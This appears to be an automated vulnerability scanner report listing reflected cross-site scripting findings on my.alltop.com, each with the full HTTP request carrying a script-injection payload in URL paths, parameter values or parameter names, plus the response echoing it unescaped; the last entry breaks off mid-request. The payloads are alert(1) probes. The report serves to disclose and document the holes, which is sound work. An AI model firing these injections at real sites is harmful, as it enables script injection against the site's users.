Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/v?b10f3"><script>alert(1)</script>49c0e39747a=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.226. http://my.alltop.com/alpha/w ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of the '"--></style></script><script>netsparker(0x00020A)</script> request parameter is copied into the HTML document as plain text between tags. The payload 36733<script>alert(1)</script>b1dcf723d06 was submitted in the '"--></style></script><script>netsparker(0x00020A)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?'"--></style></script><script>netsparker(0x00020A)</script>36733<script>alert(1)</script>b1dcf723d06 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>36733<script>alert(1)</script>b1dcf723d06" method="post" accept-charset="utf-8">
...[SNIP]...

1.227. http://my.alltop.com/alpha/w [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38b0"><script>alert(1)</script>909e3c865c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/wc38b0"><script>alert(1)</script>909e3c865c2 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:04 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:04 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/wc38b0"><script>alert(1)</script>909e3c865c2" method="post" accept-charset="utf-8">
...[SNIP]...

1.228. http://my.alltop.com/alpha/w [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78ce8"><script>alert(1)</script>82cd37b2ea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?78ce8"><script>alert(1)</script>82cd37b2ea0=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w?78ce8"><script>alert(1)</script>82cd37b2ea0=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.229. http://my.alltop.com/alpha/w [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e86a"><script>alert(1)</script>4c575002120 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E5e86a"><script>alert(1)</script>4c575002120 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:31 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:31 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019D)%3C/script%3E5e86a"><script>alert(1)</script>4c575002120" method="post" accept-charset="utf-8">
...[SNIP]...

1.230. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d82"><script>alert(1)</script>5b19d9a730b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C20d82"><script>alert(1)</script>5b19d9a730b/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C20d82"><script>alert(1)</script>5b19d9a730b/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.231. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c59db"><script>alert(1)</script>f6b5442e0d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3Cc59db"><script>alert(1)</script>f6b5442e0d9/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:20 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:20 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3Cc59db"><script>alert(1)</script>f6b5442e0d9/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.232. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d27e8"><script>alert(1)</script>e7d36a383a3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3Cd27e8"><script>alert(1)</script>e7d36a383a3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:21 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:21 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3Cd27e8"><script>alert(1)</script>e7d36a383a3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.233. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ffe"><script>alert(1)</script>729d89e3258 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3Ed3ffe"><script>alert(1)</script>729d89e3258 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:23 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3Ed3ffe"><script>alert(1)</script>729d89e3258" method="post" accept-charset="utf-8">
...[SNIP]...

1.234. http://my.alltop.com/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d5b"><script>alert(1)</script>ad51198bb33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E?46d5b"><script>alert(1)</script>ad51198bb33=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
